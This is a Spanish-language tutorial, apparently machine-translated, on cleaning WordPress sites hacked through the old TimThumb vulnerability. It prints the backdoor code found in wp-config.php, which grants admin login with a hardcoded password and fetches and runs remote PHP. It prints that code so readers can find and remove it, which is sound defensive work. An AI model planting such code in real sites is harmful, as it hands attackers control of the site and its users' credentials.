Cómo arreglar y limpiar el hackeo de TimThumb en WordPress
Entonces, si recuerdas correctamente, hubo un problema de seguridad con el script TimThumb en agosto que se solucionó. Sin embargo, aún para nuestra sorpresa, muchos sitios siguen usando la versión anterior. Hemos arreglado tres sitios en lo que va del mes pasado, uno de ellos ayer. Por lo tanto, tiene sentido simplemente escribir un artículo paso a paso, para que nuestros usuarios puedan seguirlo. Los tres usuarios para los que solucionamos este problema ni siquiera sabían qué era TimThumb o si lo estaban usando o no..
TimThumb es un script PHP que cambia el tamaño de las imágenes. Había una vulnerabilidad en él, pero es seguro usarlo ahora.
Entonces, ¿cómo sabes que tu sitio es hackeado? Si ve una gran pantalla roja en su navegador cuando visita su sitio:
Si comienza a ser bombardeado con correos electrónicos sobre usuarios que son redirigidos desde su sitio. Probablemente, el caso es que su sitio fue víctima de esta vulnerabilidad..
Como medida preventiva, todos deberían usar este Escáner de Vulnerabilidad de Timthumb. Esto le dirá si está utilizando la versión anterior de TimThumb. Muchos clubes temáticos actualizaron su núcleo de inmediato. Por lo tanto, este complemento comprobará si la nueva versión segura de Timthumb está instalada o si una versión anterior está instalada.
Ahora bien, si su sitio ya cayó en el ataque de Timthumb, entonces esto es lo que debe hacer..
Primero necesitas borrar los siguientes archivos:
/wp-admin/upd.php /wp-content/upd.php
Inicie sesión en el panel de administración de WordPress y vuelva a instalar su versión de WordPress. Estamos buscando específicamente para reinstalar estos archivos:
/wp-settings.php /wp-includes/js/jquery/jquery.js /wp-includes/js/110n.js
Entonces abre tu wp-config.php donde es más probable que encuentre este gran código de malware que está cosechando credenciales de inicio de sesión y cookies. Este código será hacia la parte inferior..
if (isset ($ _ GET ['pingnow']) && isset ($ _ GET ['pass'])) if ($ _GET ['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22') if ($ _GET ['pingnow'] == 'login') $ user_login = 'admin'; $ user = get_userdatabylogin ($ user_login); $ user_id = $ user-> ID; wp_set_current_user ($ user_id, $ user_login); wp_set_auth_cookie ($ user_id); do_action ('wp_login', $ user_login); if (($ _GET ['pingnow'] == 'exec') && (isset ($ _ GET ['file')))) $ ch = curl_init ($ _ GET ['file']); $ fnm = md5 (rand (0,100)). '. php'; $ fp = fopen ($ fnm, "w"); curl_setopt ($ ch, CURLOPT_FILE, $ fp); curl_setopt ($ ch, CURLOPT_HEADER, 0); curl_setopt ($ ch, CURLOPT_TIMEOUT, 5); curl_exec ($ ch); curl_close ($ ch); fclose ($ fp); echo "location.href = '$ fnm';"; if (($ _GET ['pingnow'] == 'eval') && (isset ($ _ GET ['file')))) $ ch = curl_init ($ _ GET ['file']); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, true); curl_setopt ($ ch, CURLOPT_HEADER, 0); curl_setopt ($ ch, CURLOPT_TIMEOUT, 5); $ re = curl_exec ($ ch); curl_close ($ ch); eval ($ re);
En la carpeta de su tema, busque en cualquier lugar donde el script TimThumb esté almacenando los archivos en caché. Normalmente están en esta estructura:
/wp-content/themes/themename/scripts/cache/external_MD5Hash.php /wp-content/themes/themename/temp/cache/external_MD5Hash.php
Eliminar todo lo que se ve así. Si no está seguro de las cosas, elimine todo lo que no sea un archivo de imagen..
Lo siguiente que debe hacer es reemplazar timthumb.php con la última versión que se puede encontrar en http://timthumb.googlecode.com/svn/trunk/timthumb.php
Ahora sería una buena idea cambiar sus contraseñas comenzando con su información de inicio de sesión de MySQL a su información de inicio de sesión de WordPress. No olvide cambiar la contraseña de MySQL en wp-config.php o aparecerá la pantalla "Error al establecer la conexión".
Cambia las claves secretas en tu archivo wp-config.php. Puede generar una nueva clave accediendo al generador en línea..
Ahora que has terminado. No olvide vaciar todos los complementos de almacenamiento en caché de la página. Como medida de precaución, es bueno borrar también la memoria caché y las cookies de su navegador..
Para los desarrolladores, intente usar la función Tamaños de imagen adicionales en WordPress para reemplazar las funcionalidades de Timthumb.
Háganos saber si necesita más ayuda utilizando nuestro formulario de contacto..